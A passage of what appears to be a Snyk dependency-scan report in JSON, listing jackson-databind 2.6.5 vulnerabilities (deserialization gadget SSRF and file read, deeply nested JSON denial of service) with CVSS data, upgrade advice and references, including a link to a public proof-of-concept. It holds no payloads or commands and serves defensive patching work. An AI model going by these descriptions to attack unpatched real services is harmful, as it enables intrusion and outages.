Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2854", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", + "title": "GitHub Release" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:04.169362Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", + "epssDetails": { + "percentile": "0.74700", + "probability": "0.00431", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-20190" + ], + "CWE": [ + "CWE-502", + "CWE-918" + ], + "GHSA": [ + "GHSA-5949-rw7g-wx7w" + ], + "RHSA": [ + "RHSA-1610966837463990" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-18T12:50:16.466618Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-16T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-18T17:23:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:17.193594Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9)", + "[2.8.0,2.8.11.4)", + "[2.7.0,2.7.9.6)", + "[,2.6.7.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9", + "2.8.11.4", + "2.7.9.6", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2326", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", + "title": "Github Release Tag" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12086", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:55.897269Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", + "epssDetails": { + "percentile": "0.74218", + "probability": "0.00415", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12086" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5ww9-j83m-q7qx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-05-19T10:19:10.287403Z", + "functions_new": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-17T18:12:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-05-17T18:12:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.785293Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.12.6.1", + "2.13.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when using nested objects." + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", + "className": "UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2816", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/3416", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.056720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", + "epssDetails": { + "percentile": "0.60309", + "probability": "0.00218", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36518" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-03-11T13:26:43.073121Z", + "functions_new": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-11T13:18:25Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-03-11T14:24:04Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.929583Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3582", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.201956Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", + "epssDetails": { + "percentile": "0.66401", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42004" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:21:18.588353Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:07:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T10:05:31.043255Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.261115Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", + "title": "Chromium Bugs" + }, + { + "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", + "title": "Documentation" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3590", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": 